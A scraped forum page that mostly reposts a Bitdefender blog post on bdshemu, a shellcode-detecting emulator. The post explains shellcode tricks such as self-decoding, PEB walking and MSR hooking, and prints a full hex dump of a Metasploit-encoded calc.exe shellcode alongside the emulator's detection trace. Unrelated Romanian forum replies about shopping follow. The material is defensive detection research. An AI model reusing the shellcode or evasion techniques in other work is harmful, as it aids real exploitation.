doesn’t even allow accesses to other addresses. The only state apart from the registers that can be accessed is the shellcode itself and the stack, and both are copies of the actual memory contents - the system state is never modified during the emulation, only the provided SHEMU_CONTEXT is. This makes bdshemu extremely fast, simple, and lets us focus on its main purpose: detecting shellcodes. As far as instruction support goes, bdshemu supports all the basic x86 instructions, such as branches, arithmetic, logic, shift, bit manipulation, multiplication/divison, stack access and data transfer instructions. In addition, it also has support for other instructions, such as some basic MMX or AVX instructions - PUNPCKLBW or VPBROADCAST are two good examples. bdshemu Detection Techniques In order to determine whether an emulated piece of code behaves like a shellcode, there are several indicators bdshemu uses. NOP Sled This is the classic presentation of shellcodes; since the exact entry point of the shellcode when gaining code execution may be unknown, attackers usually prepend a long sequence of NOP instructions, encoding 0x90. The parameters for the NOP-sled length can be controlled when calling the emulator, via the NopThreshold context field. The default value is SHEMU_DEFAULT_NOP_THRESHOLD, which is 75, meaning that minimum 75% of all the emulated instruction must be NOP. RIP Load Shellcodes are designed to work correctly no matter what address they’re loaded at. This means that the shellcode has to determine, dynamically, during runtime, the address it was loaded at, so absolute addressing can be replaced with some form of relative addressing. This is typically achieved by retrieving the value of the instruction pointer using well-known techniques: CALL $+5/POP ebp - executing these two instructions will result in the value of the instruction pointer being stored in the ebp register; data can then be accessed inside the shellcode using offsets relative to the ebp value; FNOP/FNSTENV [esp-0xc]/POP edi - the first instruction is any FPU instruction (not necessarily FNOP), and the second instruction, FNSTENV saves the FPU environment on the stack; the third instruction will retrieve the FPU Instruction Pointer from esp-0xc, which is part of the FPU environment, and contains the address of the last FPU executed - in our case, FNOP; from there on, addressing relative to the edi can be used to access shellcode data; Internally, bdshemu keeps track of all the instances of the instruction pointer being saved on the stack. Later loading that instruction pointer from the stack in any way will result in triggering this detection. Due to the way bdshemu keeps track of the saved instruction pointers, it doesn’t matter when, where or how the shellcode attempts to load the RIP in a register and use it, bdshemu will always trigger a detection. In 64 bit, RIP-relative addressing can be used directly, since the instruction encoding allows it. However, surprisingly, a large number of shellcodes still use a classic method of retrieving the instruction pointer (generally the CALL/POP technique), which is somehow weird, but it probably indicated that 32 bit shellcodes were ported to 64 bit with minimal modifications. Write Self Most often, shellcodes come in encoded or encrypted forms, in order to avoid certain bad characters (for example, 0x00 in a shellcode that should resemble a string may break the exploit) or to avoid detection by security technologies (for example, AV scanners). This means that during runtime, the shellcode must decode itself (usually in-place), by modifying its own contents, and then executing the plain-text code. Typical methods of decoding involve XOR or ADD based decryption algorithms. Certainly, bdshemu follows this kind of behavior, and keeps track internally of each modified byte inside the shellcode. Whenever the suspected shellcode writes any portion of itself, and then it executes it, the self-write detection will be triggered. TIB Access Once a shellcode has gained code execution, it needs to locate several functions inside various modules, in order to carry its actual payload (for example, downloading a file, or creating a process). On Windows, the most common way of doing this is by parsing the user-mode loader structures, in order to locate the addresses where the required modules were loaded, and then locate the needed functions inside these modules. The sequence of structures the shellcode will access is: The Thread Environment Block (TEB), which is located at fs:[0] (32 bit thread) or gs:[0] (64 bit thread); The Process Environment Block (PEB), which is located at TEB+0x30 (32 bit) or TEB+0x60 (64 bit) The Loader information (PEB_LDR_DATA), located inside PEB Inside the PEB_LDR_DATA, there are several lists which contain the loaded modules. The shellcode will iterate through these lists in order to locate the much needed libraries and functions. On each memory access, bdshemu will see if the shellcode tries to access the PEB field inside TEB. bdshemu will keep track of memory accesses even if they are made without the classic fs/gs segment prefixes - as long as an access to the PEB field inside TEB is identified, the TIB access detection will be triggered. Direct SYSCALL invocation Legitimate code will rely on several libraries in order to invoke operating system services - for example, in order to create a process, normal code would call one of the CreateProcess functions on Windows. It is uncommon for legitimate code to directly invoke a SYSCALL, since the SYSCALL interface may change over time. For this reason, bdshemu will trigger the SYSCALL detection whenever it sees that a suspected shellcode directly invokes a system service using the SYSCALL/SYSENTER/INT instructions. Stack Strings Another common way for shellcodes to mask their contents is to dynamically construct strings on the stack. This may eliminate the need to write Position Independent Code (PIC), since the shellcode would dynamically build the desired strings on the stack, instead of referencing them inside the shellcode as regular data. Typical ways of achieving this is by saving the string contents on the stack, and then reference the string using the stack pointer: push 0x6578652E push 0x636C6163 The code above would end up storing the string calc.exe on the stack, which can then be used as a normal string throughout the shellcode. For each value saved on the stack that resembles a string, bdshemu keeps track of the total length of the string constructed on the stack. Once the threshold indicated by the StrLength field inside the context is exceeded, the stack string detection will be triggered. The default value for this field is SHEMU_DEFAULT_STR_THRESHOLD, which is equal to 8, meaning that dynamically constructing a string equal to or longer than 8 characters on the stack will trigger this detection. bdshemu Detection Techniques for Kernel-Mode shellcodes While the above mentioned techniques are general and can be applied to any shellcode, on any operating system and on both 32 or 64 bit (except for the TIB access detection, which is Windows specific), bdshemu also has the capability of determining some kernel-specific shellcode behavior. KPCR Access The Kernel Processor Control Region (KPCR) is a per-processor structure on Windows systems that contains lots of information critical for the kernel, but which may be useful for an attacker as well. Commonly, the shellcode would wish to reference the currently executing thread, which can be retrieved by accessing the KPCR structure, at offset 0x124 on 32 bit systems and 0x188 on 64 bit systems. Just like the TIB access detection technique, bdshemu keeps track of memory accesses, and when the emulated code reads the current thread from the KPCR, it will trigger the KPCR access detection. SWAPGS execution SWAPGS is a system instruction that is only executed when transitioning from user-mode to kernel-mode and vice-versa. Sometimes, due to the specifics of certain kernel exploits, the attacker will end up needing to execute SWAPGS - for example, the EternalBlues kernel payload famously intercepted the SYSCALL handler, so it needed to execute SWAPGS when a SYSCALL took place, just like an ordinary system call would do. bdshemu will trigger the SWAPGS detection whenever it encounters the SWAPGS instruction being executed by a suspected shellcode. MSR read/write Some shellcodes (such as the aforementioned EternalBlue kernel payload) will have to modify the SYSCALL handler in order to migrate to a stable execution environment (for example, because the initial shellcode executes at a high IRQL, which needs to be lowered before calling useful routines). This is done by modifying the SYSCALL MSRs using the WRMSR instruction, and then waiting for a syscall to execute (which is at lower IRQL) to continue execution (this is also where the SWAPGS technique comes in handy, since SWAPGS must be executed after each SYSCALL on 64 bit). In addition, in order to locate the kernel image in memory, and, subsequently, useful kernel routines, a quick and easy technique is by querying the SYSCALL MSR (which normally points to the SYSCALL handler inside the kernel image), and then walk pages backwards until the beginning of the kernel image is found. bdshemu will trigger the MSR access detection whenever the suspected shellcode accesses the SYSCALL MSRs (both on 32 or 64 bit mode). Example The bdshemu project contains some synthetic test-cases, but the best way to demonstrate its functionality is by using real-life shellcodes. In this regard, Metasploit is remarkable at generating different kinds of payloads, using all kind of encoders. Let’s take the following shellcode as a purely didactic example: DA C8 D9 74 24 F4 5F 8D 7F 4A 89 FD 81 ED FE FF FF FF B9 61 00 00 00 8B 75 00 C1 E6 10 C1 EE 10 83 C5 02 FF 37 5A C1 E2 10 C1 EA 10 89 D3 09 F3 21 F2 F7 D2 21 DA 66 52 66 8F 07 6A 02 03 3C 24 5B 49 85 C9 0F 85 CD FF FF FF 1C B3 E0 5B 62 5B 62 5B 02 D2 E7 E3 27 87 AC D7 9C 5C CE 50 45 02 51 89 23 A1 2C 16 66 30 57 CF FB F3 9A 8F 98 A3 B8 62 77 6F 76 A8 94 5A C6 0D 4D 5F 5D D4 17 E8 9C A4 8D DC 6E 94 6F 45 3E CE 67 EE 66 3D ED 74 F5 97 CF DE 44 EA CF EB 19 DA E6 76 27 B9 2A B8 ED 80 0D F5 FB F6 86 0E BD 73 99 06 7D 5E F6 06 D2 07 01 61 8A 6D C1 E6 99 FA 98 29 13 2D 98 2C 48 A5 0C 81 28 DA 73 BB 2A E1 7B 1E 9B 41 C4 1B 4F 09 A4 84 F9 EE F8 63 7D D1 7D D1 7D 81 15 B0 9E DF 19 20 CC 9B 3C 2E 9E 78 F6 DE 63 63 FE 9C 2B A0 2D DC 27 5C DC BC A9 B9 12 FE 01 8C 6E E6 6E B5 91 60 F2 01 9E 62 B0 07 C8 62 C8 8C Saving this as a binary file as shellcode.bin and then viewing its contents yields a densely packed chunk of code, highly indicative of an encrypted shellcode: Using the disasmtool provided in the bddisasm project, one can use the -shemu option to run the shellcode emulator on the input. disasmtool -b32 -shemu -f shellcode.bin Running this on our shellcode will display step-by-step information about each emulated instruction, but because that trace is long, let’s jump directly to the end of if: Emulating: 0x0000000000200053 XOR eax, eax RAX = 0x0000000000000000 RCX = 0x0000000000000000 RDX = 0x000000000000ee00 RBX = 0x0000000000000002 RSP = 0x0000000000100fd4 RBP = 0x0000000000100fd4 RSI = 0x0000000000008cc8 RDI = 0x000000000020010c R8 = 0x0000000000000000 R9 = 0x0000000000000000 R10 = 0x0000000000000000 R11 = 0x0000000000000000 R12 = 0x0000000000000000 R13 = 0x0000000000000000 R14 = 0x0000000000000000 R15 = 0x0000000000000000 RIP = 0x0000000000200055 RFLAGS = 0x0000000000000246 Emulating: 0x0000000000200055 MOV edx, dword ptr fs:[eax+0x30] Emulation terminated with status 0x00000001, flags: 0xe, 0 NOPs SHEMU_FLAG_LOAD_RIP SHEMU_FLAG_WRITE_SELF SHEMU_FLAG_TIB_ACCESS We can see that the last emulated instruction is MOV edx, dword ptr fs:[eax+0x30], which is a TEB access instruction, but which also triggers emulation to be stopped, since it is an access outside shellcode memory (and remember, bdshemu will stop at the first memory access outside the shellcode or the stack). Moreover, this small shellcode (generated using Metasploit) triggered 3 detections in bdshemu: SHEMU_FLAG_LOAD_RIP - the shellcode loads the RIP inside a general-purpose register, to locate its position in memory; SHEMU_FLAG_WRITE_SELF - the shellcode descrypts itself, and then executes decrypted pieces; SHEMU_FLAG_TIB_ACCESS - the shellcode goes on to access the PEB, in order to locate important libraries and functions; These indicators are more than enough to conclude that the emulated code is, without a doubt, a shellcode. What’s even more awesome about bdshemu is that generally, at the end of the emulation, the memory will contain the decrypted form of the shellcode. disasmtool is nice enough to save the shellcode memory once emulation is done - a new file, named shellcode.bin_decoded.bin is created which now contains the decoded shellcode; let’s take a look at it: Looking at the decoded shellcode, one can immediately see not only that it is different, but that is plain text - a keen eye will quickly identify the calc.exe string at the end of the shellcode, hinting us that it is a classic calc.exe spawning shellcode. Conclusions We presented in this blog-post the Bitdefender shellcode emulator, which is a critical part of HVMI’s exploit detection technology. bdshemu is built to detect shellcode indicators at the binary-code level, without the need to emulate complex API calls, complex memory layout or complex architectural entities, such as page-tables, descriptor tables, etc. - bdshemu focuses on what matters most, emulating the instructions and determining if they behave like a shellcode. Due to its simplicity, bdshemu works for shellcodes aimed towards any operating system, as most of the detection techniques are specific to instruction-level behavior, instead of high level behavior such as API calls. In addition, it works on both 32 and 64 bit code, as well as with user or kernel specific code. Sursa: https://hvmi.github.io/blog/2020/11/11/bdshemu.html
  12. Si oare nu au adus niste bani la buget cu ocazia asta? Sau bine, in buzunarele lor, cel putin partial.
  13. Despre vacicnul Pfizer/Biontech https://recorder.ro/povestea-primului-vaccin-anti-covid-spusa-de-o-cercetatoare-romanca-din-germania/
  14. Nu stiu daca se poate urmari prea usor pretul pe emag. La un moment dat m-am uitat la mai multe produse si mi-au bagat CAPTCHA. Eu am vazut un laptop la Black Friday cu pretul de 15000 RON, redus de la 18000 RON cica. Azi, dupa Black Friday era 14000 RON. Interesant.
  15. Teoretic simplu, practic greut de pus in practica Eu am citit asta: https://blog.cloudflare.com/sad-dns-explained/
  16. Era criptat? Daca da, e mai complicat, mai ales daca nu stii pattern. Poti sa incerci sa ii schimbi display-ul, adica sa ii iei placa de baza si sa o legi la un display care merge si sa speri sa fie OK.
  17. Da, e ciudat. Cand mai comand de la alte firme, caut pe site-ul lor si daca pot comand de acolo. De cele mai multe ori e o diferenta de pret care altfel ar ajunge la emag.
  18. Costa 5 dolari pe DigitalOcean.
  19. Nu ma atrage nimic dar trebuie sa recunosc ca am gasit la emag mai multe produse (pe care le comandasem anterior) reduse. Nu cu foarte mult, dar reduse (15%-20%).
  20. Da, nu mi se pare cine stie ce: https://s13emagst.akamaized.net/layout/ro/newsletter/2020_11_13_BF_blackout/
  21. Am dat o tura prin lista de comenzi date la emag sa vad ce preturi au acum produsele si cu cate le-am luat eu. Sunt cateva ceva mai scumpe, dar majoritatea sunt putin mai ieftine (ceea ce are sens).
  22. M-am uitat si eu pe diverse site-uri si nu am vazut nimic interesant. Adica reducere, fie ea si pe bune, de 200 RON la un pret de 1700 RON nu mi se pare chiar mare lucru. As prefera sa dau acei 200 RON si sa imi vina produsul in ziua urmatoare, nu in 2 saptamani. Din produsele de la emag pot spune ca acel scan de birou e redus pe bune, dar nu am urmarit alte produse si nu am idee cat de reduse sunt.
  23. O sa fie inregistrata si voi publica ulterior (zilele urmatoare) prezentarile pe Youtube (probabil). Va trebui probabil sa "tai" fiecare prezentare ca cineva sa le poata vedea cum trebuie, deci nu stiu daca va merge direct in Zoom ca nu ar fi elegant asa la gramada.
  24. Minim 50 de posturi pentru vanzare/cumparare.
×
×
  • Create New...